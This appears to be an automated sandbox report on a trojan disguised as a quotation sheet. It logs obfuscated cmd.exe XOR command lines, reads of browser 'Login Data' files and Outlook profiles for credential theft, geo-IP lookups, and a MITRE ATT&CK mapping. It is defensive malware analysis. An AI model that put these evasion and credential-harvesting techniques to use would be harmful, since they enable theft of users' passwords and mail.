            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Queries volume information: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe VolumeInformation
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040322B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR
MITRE ATT&CK matrix, listed per tactic (numbers in parentheses are the signature counts shown in the original matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (1); Native API (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Access Token Manipulation (1); Process Injection (11); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (11); Deobfuscate/Decode Files or Information (11); Time Based Evasion (1); Obfuscated Files or Information (3); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (11); Virtualization/Sandbox Evasion (31); Time Based Evasion (1); System Network Configuration Discovery (1); File and Directory Discovery (2); System Information Discovery (115); Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1480054; Sample: z1QuotationSheetVSAA6656776.exe; Startdate: 24/07/2024; Architecture: WINDOWS; Score: 100)

Start node: contacts reallyfreegeoip.org, checkip.dyndns.org and 3 other IPs or domains. Signatures: Found malware configuration; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures. reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP).
z1QuotationSheetVSAA6656776.exe 37 (started): dropped C:\Users\user\AppData\Local\...\nsExec.dll (PE32) and C:\Users\user\AppData\Local\...\System.dll (PE32). Signatures: Obfuscated command line found; Mass process execution to delay analysis; Switches to a custom stack to bypass stack traces. Starts z1QuotationSheetVSAA6656776.exe 15 8, cmd.exe, cmd.exe and 62 other processes.
z1QuotationSheetVSAA6656776.exe 15 8 (started): contacts reallyfreegeoip.org 172.67.177.134, 443, 49782, 49783 CLOUDFLARENETUS United States; checkip.dyndns.com 158.101.44.242, 49781, 80 ORACLE-BMC-31898US United States; 2 other IPs or domains. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc).
cmd.exe (each instance): starts Conhost.exe. The 62 other processes: start Conhost.exe (three shown) and 59 other processes.

Source | Detection | Scanner | Label
z1QuotationSheetVSAA6656776.exe | 50% | ReversingLabs | Win32.Trojan.Guloader
z1QuotationSheetVSAA6656776.exe | 100% | Avira | HEUR/AGEN.1333750
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dll | 0% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
https://drive.google.com/ | 0% | Avira URL Cloud | safe
http://checkip.dyndns.orgd | 0% | Avira URL Cloud | safe
http://reallyfreegeoip.org | 0% | Avira URL Cloud | safe
http://nsis.sf.net/NSIS_Error | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/149.18.24.104$ | 0% | Avira URL Cloud | safe
https://drive.google.com/z | 0% | Avira URL Cloud | safe
http://reallyfreegeoip.orgd | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org/ | 0% | Avira URL Cloud | safe
http://checkip.dyndns.comd | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
https://apis.google.com | 0% | Avira URL Cloud | safe
http://checkip.dyndns.com | 0% | Avira URL Cloud | safe
http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org | 0% | Avira URL Cloud | safe
https://drive.usercontent.google.com/ | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org | 0% | Avira URL Cloud | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | Avira URL Cloud | safe
https://support.google.com/chrome/?p=plugin_flash | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org/d | 0% | Avira URL Cloud | safe
https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/ | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/149.18.24.104 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.251.167.113 | true | false | | unknown
drive.usercontent.google.com | 142.251.111.132 | true | false | | unknown
reallyfreegeoip.org | 172.67.177.134 | true | true | | unknown
checkip.dyndns.com | 158.101.44.242 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/149.18.24.104 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_Error | z1QuotationSheetVSAA6656776.exe | false | Avira URL Cloud: safe | unknown
https://drive.google.com/z | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.comd | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/ | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/149.18.24.104$ | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://reallyfreegeoip.orgd | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://reallyfreegeoip.org | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.orgd | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_flash | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.quovadis.bm0 | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com/ | z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D69000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://apis.google.com | z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.com | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | z1QuotationSheetVSAA6656776.exe | false | Avira URL Cloud: safe | unknown
https://ocsp.quovadisoffshore.com0 | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/d | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
